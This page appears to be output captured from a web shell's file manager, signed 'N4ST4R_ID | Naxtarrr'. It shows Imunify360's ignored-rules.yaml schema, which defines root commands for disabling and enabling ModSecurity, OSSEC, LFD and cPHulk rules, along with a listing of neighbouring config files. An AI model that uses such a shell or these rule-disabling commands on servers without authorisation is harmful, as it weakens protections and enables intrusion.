Submit
Path:
~
/
/
opt
/
imunify360
/
venv
/
lib64
/
python3.11
/
site-packages
/
im360
/
simple_rpc
/
schema
/
File Content:
ignored-rules.yaml
rules disable: help: Add a new rule to the disabled rules list return_type: NullAgentResponse cli: users: - root type: dict schema: id: help: ID number of the rule provided by the firewall plugin. type: string required: true plugin: help: Firewall plugin name. Can be one of the following [modsec | ossec | lfd] type: string required: true allowed: - ossec - modsec - lfd - cphulk domains: help: List of domains to disable a rule for. Can only be used with modsec type. type: list schema: type: string name: help: Name of the added rule or details of the rule from ModSecurity or OSSEC. type: string required: true rules enable: help: Remove a rule from the disabled rules list return_type: NullAgentResponse cli: users: - root type: dict schema: id: help: ID number of the rule provided by the firewall plugin. type: string required: true plugin: help: Firewall plugin name. Can be one of the following [modsec | ossec | lfd] type: string required: true allowed: - ossec - modsec - lfd - cphulk rules list-disabled: help: Display the list of the disabled rules cli: users: - root type: dict return_type: BlockedRulesAgentResponse schema: limit: type: integer default: 100 offset: type: integer default: 0 order_by: type: list schema: type: order_by coerce: order_by nullable: true rules update-app-specific-rules: help: Allows to update WAF ruleset configurator immediately (generally, executed by cron) cli: users: - root require_rpc: any rules update-shared-disabled-rules: help: Force reload modsec disabled rules config cli: users: - root
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
lists
---
0755
configuration_management.pickle
512 bytes
0644
configuration_management.yaml
499 bytes
0644
conflicts.pickle
278 bytes
0644
conflicts.yaml
263 bytes
0644
control-panel.pickle
204 bytes
0644
control-panel.yaml
206 bytes
0644
custom-lists.pickle
106 bytes
0644
custom-lists.yaml
90 bytes
0644
features.pickle
945 bytes
0644
features.yaml
1022 bytes
0644
health.pickle
54 bytes
0644
health.yaml
39 bytes
0644
hosting-panel.pickle
486 bytes
0644
hosting-panel.yaml
461 bytes
0644
ignored-rules.pickle
1777 bytes
0644
ignored-rules.yaml
1926 bytes
0644
import.pickle
209 bytes
0644
import.yaml
202 bytes
0644
incidents.pickle
1976 bytes
0644
incidents.yaml
2359 bytes
0644
kcarectl.pickle
242 bytes
0644
kcarectl.yaml
205 bytes
0644
malware-generic-event.pickle
120 bytes
0644
malware-generic-event.yaml
102 bytes
0644
myimunify.pickle
714 bytes
0644
myimunify.yaml
779 bytes
0644
proactive.pickle
4053 bytes
0644
proactive.yaml
4592 bytes
0644
remote_proxy.pickle
1371 bytes
0644
remote_proxy.yaml
1535 bytes
0644
smart_advice.pickle
182 bytes
0644
smart_advice.yaml
165 bytes
0644
smtp-blocking.pickle
311 bytes
0644
smtp-blocking.yaml
295 bytes
0644
uninstall-cleanup.pickle
401 bytes
0644
uninstall-cleanup.yaml
386 bytes
0644
whitelist-domain.pickle
849 bytes
0644
whitelist-domain.yaml
963 bytes
0644
whitelist_rbl.pickle
103 bytes
0644
whitelist_rbl.yaml
87 bytes
0644
whitelisted-crawlers.pickle
879 bytes
0644
whitelisted-crawlers.yaml
964 bytes
0644
N4ST4R_ID | Naxtarrr